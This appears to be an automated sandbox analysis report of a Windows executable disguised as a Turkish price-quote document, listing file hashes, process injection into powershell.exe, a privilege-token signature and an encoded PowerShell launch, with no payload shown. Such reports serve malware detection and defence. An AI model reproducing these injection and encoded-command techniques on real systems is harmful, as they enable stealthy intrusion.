Analysis
  max time kernel: 119s
  max time network: 123s
  platform: windows7_x64
  resource: win7-20240221-en
  resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  submitted: 18/05/2024, 18:33

Static task: static1
Behavioral task: behavioral1
  Sample: TALEP VE FİYAT TEKLİFİ FDP..exe
  Resource: win7-20240221-en
General
  Target: TALEP VE FİYAT TEKLİFİ FDP..exe
  Size: 987KB
  MD5: 4159fce548f4229d4803ce6e5e2d0707
  SHA1: 188eb1c229a8cbdde36a294ac3c2a3ac2168ff72
  SHA256: 29894553b6237d105f91a2b43be873b28ca6b0359167543d28ec35cd3e77c8c7
  SHA512: 6600e40ed00baa3ed021e0b647025fc51f2bb313af6ed7a8e0de07b26f9989c8207f2c079b9f15b18246651d142c596af7f20fb4c7b8edccc08a50b4dd23944f
  SSDEEP: 24576:IyDtH9ivKgfG9pkNem5dwYeKrHHPYSpmqF:IwdcvKc8YlQKrHHPYSEqF
Malware Config

Signatures
    pid    Process
    2088   powershell.exe

  Suspicious behavior: EnumeratesProcesses (1 IoCs)
    pid    Process
    2088   powershell.exe

  Suspicious use of AdjustPrivilegeToken (1 IoCs)
    description               pid    Process
    Token: SeDebugPrivilege   2088   powershell.exe

  Suspicious use of WriteProcessMemory (3 IoCs)
    description                         pid    Process                           procid_target
    PID 2168 wrote to memory of 2088    2168   TALEP VE FİYAT TEKLİFİ FDP..exe   29
    PID 2168 wrote to memory of 2088    2168   TALEP VE FİYAT TEKLİFİ FDP..exe   29
    PID 2168 wrote to memory of 2088    2168   TALEP VE FİYAT TEKLİFİ FDP..exe   29
Processes
  C:\Users\Admin\AppData\Local\Temp\TALEP VE FİYAT TEKLİFİ FDP..exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\TALEP VE FİYAT TEKLİFİ FDP..exe"
    - Suspicious use of WriteProcessMemory
    PID: 2168

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell.exe -EncodedCommand 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
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2088
-
Network
MITRE ATT&CK Enterprise v15
Downloads
  Filesize: 33KB
  MD5: 8998dbb6f0a43a5f64e7d688f74a3168
  SHA1: b10a1e9190a3955acaa25f80127f18d140d9a127
  SHA256: ecda43d8f11e4211b02c61572cb82269fcb8985a42b53caebeefff546253d26c
  SHA512: b8d13d6583a7ee357544be3b0f8c52576973cd9c18ea6b9f29978558e51e62f6fe1e8bc563f77498b4d0d9bd0ca28104687f20e73814623048169825c214c66b